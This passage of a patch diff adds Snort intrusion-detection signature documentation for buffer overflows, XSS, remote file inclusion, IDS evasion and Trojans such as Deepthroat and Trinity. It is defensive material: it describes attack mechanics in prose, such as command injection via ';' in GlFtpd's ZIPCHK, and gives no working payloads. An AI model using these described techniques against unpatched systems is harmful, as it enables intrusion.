+ may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+ may occur in network packets aimed at overflowing IRIX MIPS network services. The buffer overflow attack attempts to force the vulnerable application to execute  attacker-controlled code in order to gain interactive access or run arbitrary commands on the vulnerable system.
+
+A specific string used during the overflow is application-dependent however, a platform-specific command or code may be present and is detected by this rule.
+
+--
+Attack Scenarios: 
+An attacker launches an overflow exploit against a vulnerable FTP server and gains the ability to start a shell session, thus obtaining interactive access to the target.
+
+--
+Ease of Attack: 
+Simple
+
+
+--
+False Positives: 
+This event may be generated by legitimate traffic to the specified port.
+
+
+-- 
+False Negatives: 
+This event is specific to the shell code defined in the rule.
+Other shell code sequences may not be detected.
+
+--
+Corrective Action: 
+Check the target host for other signs of compromise.
+
+Look for other events concerning the target host.
+
+Apply vendor supplied patches and keep the operating system up to date.
+
+--
+Contributors: 
+Original Rule Writer Unkown
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS357
+
+--
--- /dev/null
+++ b/doc/signatures/100000727.txt
@@ -0,0 +1,56 @@
+
+
+Rule:
+
+--
+Sid:
+100000727
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site scripting vulnerability in the "Softbiz Banner Exchange" application running on a webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site scripting vulnerability via the "city" parameter in the "insertmember.php" script used by the "Softbiz Banner Exchange" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to retrieve sensitive data, execute system binaries or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using Softbiz Banner Exchange
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
--- /dev/null
+++ b/doc/signatures/111-14.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 
+111-14
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may indicate an attempt to evade an IDS.
+
+--
+Detailed Information:
+This event indicates that the pre-processor stream4 has detected forward
+overlapping packets that may indicate an attempt is being made to evade
+detection by an IDS.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker can attempt to hide malicious payload data by sending
+fragmented packets that overlap.
+
+-- 
+Ease of Attack: 
+Simple. Tools such as fragroute contain this functionality.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1081.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1081
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1697.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1697
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2836.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2836
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure relocate_masterdef
+. This procedure is included in
+sys.dbms_repcat_mas.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3266.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3266
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3126.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3126
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2644.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+2644
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases have a built-in function "from_tz" that is used to
+convert the format of a timestamp. This function contains a programming
+error that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in the second parameter
+of the function.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string as the value for this command.
+The result could permit the attacker to gain escalated privileges and
+run code of their choosing. This attack requires an attacker to logon
+to the database with a valid username and password combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.nextgenss.com/advisories/ora_from_tz.txt
+
+--
--- /dev/null
+++ b/doc/signatures/947.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+947
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft FrontPage
+Server Extensions.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft FrontPage Server Extensions. Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft FrontPage Server Extensions
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1612.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1612
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000178.txt
@@ -0,0 +1,60 @@
+Rule: 
+
+--
+Sid: 
+100000178
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the Hasbani Web server.
+
+-- 
+Impact: 
+Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in the Hasbani web server that may allow an attacker to 
+initiate a DoS condition on the server. Poor programming in the web server may 
+result in the server entering an endless loop when processing malformed GET 
+requests. This can lead to an exhaustion of system resources and a DoS 
+condition.
+
+--
+Affected Systems:
+Hasbani web server 2.0
+
+--
+Attack Scenarios: 
+An attacker can supply a malformed GET request to the web server to cause the 
+DoS. Alternately, exploit code exists for this vulnerability.
+
+-- 
+Ease of Attack: 
+Simple. Exploits exists.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+Corrective Action: 
+Use Apache.
+
+--
+Contributors:
+Original Rule writer rmkml <rmkml@free.fr>
+Sourcefire Vulnerability Research Team
+Alex Kirk <akirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3445.txt
@@ -0,0 +1,54 @@
+Rule:
+
+--
+Sid:
+3445
+
+--
+Summary:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+This rule does not generate an event. It is used in conjunction with
+other rules to reduce the possibility of false postives from occuring.
+
+--
+Affected Systems:
+	NA
+
+--
+Attack Scenarios:
+NA
+
+--
+Ease of Attack:
+NA
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+NA
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1104.txt
@@ -0,0 +1,59 @@
+Rule:  
+--
+
+Sid:
+1104
+
+--
+
+Summary:
+This event is generated when an attempt is made to evade an IDS in a possible 
+web attack by sending an obfuscated request in small increments.
+
+--
+Impact:
+Unknown.
+
+--
+Detailed Information:
+Under normal circumstances, a web request fits inside a single packet. However,
+it is possible to obfuscate a web attack by sending the attack one character
+at a time.  This may evade some IDS systems. Tools such as Whisker can
+be configured to do this.
+
+--
+Affected Systems:
+	All Web Servers
+ 
+--
+Attack Scenarios:
+An attacker can use an automated tool, like Whisker, to launch an attack
+against a web server.
+
+--
+Ease of Attack:
+Simple. Exploits and tools are widely available.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Check the host for signs of compromise.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1981.txt
@@ -0,0 +1,75 @@
+Rule:
+
+--
+Sid:
+1981
+
+--
+Summary:
+Deepthroat is a Trojan Horse offering the attacker control of the target.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+
+The Trojan changes system registry settings to add the Deepthroat sever to programs normally started on boot.
+
+See also rules with sids 195, 1980, 1981, 1982 and 1983.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan. Once compromised, this Trojan grants the attacker the ability to almost completely control the target.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\
+
+Registry keys added are:
+
+	Systemtray
+
+Removal of the files pddt.dat and systray.exe from the Windows system directory is required.
+
+Ending the process systray.exe is also necessary. A reboot of the infected machine is recommended.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS106
+
+Symantec Security Response
+http://securityresponse.symantec.com/avcenter/venc/data/deepthroat.trojan.html
+
+--
--- /dev/null
+++ b/doc/signatures/1843.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1843
+
+--
+Summary:
+This event is generated when  an attacker attempts to connect to a 
+Trinity DDoS Trojan server.
+
+--
+Impact:
+Possible Distributed Denial of Service and control of the victim host.
+
+--
+Detailed Information:
+This Trojan affects UNIX operating systems:
+
+Trinity is used as a Distributed Denial of Service (DDoS) agent and can 
+launch DDoS attacks from a large number of hosts against a target.
+
+Due to the nature of this Trojan it is unlikely that the attacker's 
+client IP address has been spoofed.
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This
+event is indicative of an existing infection being activated. Initial
+compromise may be due to the exploitation of another vulnerability.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Delete the Trojan and kill any associated processes.
+
+Restore the system from known good backups.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3097.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3097
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1921.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+
+Sid:
+1921
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability associated with the GlFtpd ZIPCHK command that may permit
+the execution of arbitrary commands with the privileges of the process
+running GlFtpd.
+
+--
+Impact:
+Remote access.  A successful attack may permit the execution of
+arbitrary commands with the privileges of GlFtpd on the vulnerable
+server.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a
+vulnerability associated with the ZIPCHK command of the GlFtpd server. 
+GlFtpd provides FTP software for UNIX hosts.  The ZIPCHK command
+supplies integrity checking of a downloaded ZIP file.  The file name
+supplied with the ZIPCHK is not scrutinized to determine if it is a
+valid name.  An attacker can supply a UNIX command with the character
+";" in the argument to the ZIPCHK command, causing the execution of the
+command with the privileges of the process running GlFtpd.
+
+--
+Affected Systems:
+	GlFtpd 1.17.2. 
+
+--
+Attack Scenarios:
+An attacker can remotely execute arbitrary commands on the vulnerable
+server.
+
+--
+Ease of Attack:
+Simple. Exploits code exists.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com> 
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2684.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2684
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure pushdeferredtxns
+. This procedure is included in
+sys.ltutil.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2673.txt
@@ -0,0 +1,89 @@
+Rule:
+
+--
+Sid:
+2673
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the processing of a Portable Network Graphics (PNG) file by
+libpng.
+
+--
+Impact:
+A successful attack may cause a buffer overflow and the subsequent execution
+of arbitrary code on a vulnerable client host.
+
+--
+Detailed Information:
+A vulnerability exists in the way libpng handles the transparency chunk of
+a PNG file, enabling a buffer overflow and the subsequent execution of
+arbitrary code on a vulnerable client.  A PNG datastream consists of a PNG
+marker followed by a sequence of chunks that have a specific format and
+function.
+
+When libpng processes a PNG datastream, it expects to find chunk types
+in a particular order.  For an image with palette color type, the PLTE
+(palette) chunk must precede a tRNS (transparency) chunk.  If it does not,
+an error is generated, but decoding continues.  Due to a logic error,
+the length associated with the tRNS chunk is not properly validated.  A
+length of greater than 256 bytes can cause a buffer overflow and the
+subsequent execution of arbitrary code when the PNG image is processed.
+
+--
+Affected Systems:
+Hosts running libpng 1.2.5 and prior
+Hosts running libpng 1.0.15 and prior
+
+--
+Attack Scenarios:
+An attacker can create a malformed PNG file on a web server, entice a user
+to download it, possibly causing a buffer overflow on a vulnerable client.
+
+--
+Ease of Attack:
+Simple. Exploit code exists.
+
+--
+False Positives:
+A false positive may be generated if both the PLTE and tRNS chunks of the PNG
+datastream are not found in the first 300 bytes of the returned packet.  The
+flow_depth parameter of http_inspect can be configured to increase the default
+size of the returned packet.  It should be noted that altering this from the
+default value of 300 bytes may slow performance depending on the type and volume
+of traffic found on your network.
+
+--
+False Negatives:
+An alert may not be generated if PLTE and tRNS chunks of the PNG datastream are
+not found in the first 300 bytes of the returned packet. The flow_depth
+parameter of http_inspect can be configured to increase the default size of the
+returned packet.  It should be noted that altering this from the default value
+of 300 bytes may slow performance depending on the type and volume of traffic
+found on your network.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Joe Stewart <jstewart@lurhq.com>
+Judy Novak <judy.novak@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+
+--
+Additional References
+
+CVE:
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0597
+
+Bugtraq:
+http://www.securityfocus.com/bid/10872
+
+Other:
+http://scary.beasts.org/security/CESA-2004-001.txt
+
+--
--- /dev/null
+++ b/doc/signatures/119-17.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 
+119-17
+
+-- 
+Summary: 
+This event is generated when the pre-processor http_inspect
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may indicate improper use of unauthorized web proxy
+servers.
+
+--
+Detailed Information:
+This event is generated when the http_inspect pre-processor detects the
+use of an unauthorized web proxy by clients on the protected network.
+This event may also be generated if a web client is not using one of the
+configured proxy servers to browse the web.
+
+--
+Affected Systems:
+	All client systems.
+
+--
+Attack Scenarios: 
+A malicious user may try to use an unauthorized proxy server in an
+attempt to subvert company policy on the use of the Internet.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches.
+
+--
+Contributors:
+Daniel Roelker <droelker@sourcefire.com> 
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+HTTP IDS Evasions Revisited - Daniel Roelker
+http://docs.idsresearch.org/http_ids_evasions.pdf
+
+--
--- /dev/null
+++ b/doc/signatures/100000813.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000813
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "SimpleBoard SBP" application running on a webserver. Access to the file "file_upload.php" using a remote file being passed as the "sbp" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "sbp" parameter in the "file_upload.php" script used by the "SimpleBoard SBP" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
